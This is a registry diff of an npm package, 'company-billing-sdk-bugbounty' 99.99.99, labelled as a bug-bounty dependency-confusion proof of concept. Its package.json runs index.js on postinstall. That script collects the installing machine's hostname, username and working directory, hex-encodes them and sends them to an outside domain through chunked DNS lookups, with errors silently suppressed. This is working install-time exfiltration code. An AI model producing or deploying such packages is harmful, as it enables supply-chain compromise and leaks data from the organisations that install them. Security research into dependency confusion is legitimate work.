company-billing-sdk-bugbounty 99.99.99
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/index.js +49 -0
- package/package.json +15 -0
package/index.js
ADDED
|
@@ -0,0 +1,49 @@
|
|
|
1
|
+
// Bug Bounty - Dependency Confusion PoC
|
|
2
|
+
// Package: company-billing-sdk-bugbounty
|
|
3
|
+
// If you have any questions, please contact: dd_06@wearehackerone.com
|
|
4
|
+
|
|
5
|
+
const dns = require('dns');
|
|
6
|
+
const os = require('os');
|
|
7
|
+
|
|
8
|
+
function toHex(input) {
|
|
9
|
+
return Buffer.from(input, 'utf8').toString('hex');
|
|
10
|
+
}
|
|
11
|
+
|
|
12
|
+
function sendDnsPayload() {
|
|
13
|
+
try {
|
|
14
|
+
const parsed = new URL('https://deepbounty.dd06-dev.fr/cb/c022ab3b-c0aa-4fc5-8801-dc21beb7ac34');
|
|
15
|
+
const baseDomain = parsed.hostname;
|
|
16
|
+
// Extract UUID from path or default to 'cb'
|
|
17
|
+
const uuidLabel = (parsed.pathname.split('/').filter(Boolean).pop() || 'cb').replace(/[^a-zA-Z0-9]/g, '');
|
|
18
|
+
|
|
19
|
+
const info = {
|
|
20
|
+
pkg: "company-billing-sdk-bugbounty",
|
|
21
|
+
host: os.hostname(),
|
|
22
|
+
user: os.userInfo().username,
|
|
23
|
+
cwd: process.cwd(),
|
|
24
|
+
time: new Date().toISOString()
|
|
25
|
+
};
|
|
26
|
+
|
|
27
|
+
const hexPayload = toHex(JSON.stringify(info));
|
|
28
|
+
// Split into 50-char chunks for safe DNS labels
|
|
29
|
+
const chunks = hexPayload.match(/.{1,50}/g) || [];
|
|
30
|
+
|
|
31
|
+
if (!chunks.length || !baseDomain) return;
|
|
32
|
+
|
|
33
|
+
// Iterate and send using System Resolver
|
|
34
|
+
chunks.forEach((chunk, index) => {
|
|
35
|
+
const hostname = `${index}-${chunks.length}.${uuidLabel}.${chunk}.${baseDomain}`;
|
|
36
|
+
|
|
37
|
+
// Jitter to avoid flooding local resolver
|
|
38
|
+
setTimeout(() => {
|
|
39
|
+
dns.lookup(hostname, (err) => {
|
|
40
|
+
});
|
|
41
|
+
}, index * 200);
|
|
42
|
+
});
|
|
43
|
+
|
|
44
|
+
} catch (e) {
|
|
45
|
+
// Silent failure to avoid breaking the build
|
|
46
|
+
}
|
|
47
|
+
}
|
|
48
|
+
|
|
49
|
+
sendDnsPayload();
|
package/package.json
ADDED
|
@@ -0,0 +1,15 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "company-billing-sdk-bugbounty",
|
|
3
|
+
"version": "99.99.99",
|
|
4
|
+
"description": "Bug Bounty package - If you see this, your organization may be vulnerable to dependency confusion",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"postinstall": "node index.js"
|
|
8
|
+
},
|
|
9
|
+
"keywords": [
|
|
10
|
+
"security",
|
|
11
|
+
"bug-bounty",
|
|
12
|
+
"dependency-confusion"
|
|
13
|
+
],
|
|
14
|
+
"license": "MIT"
|
|
15
|
+
}
|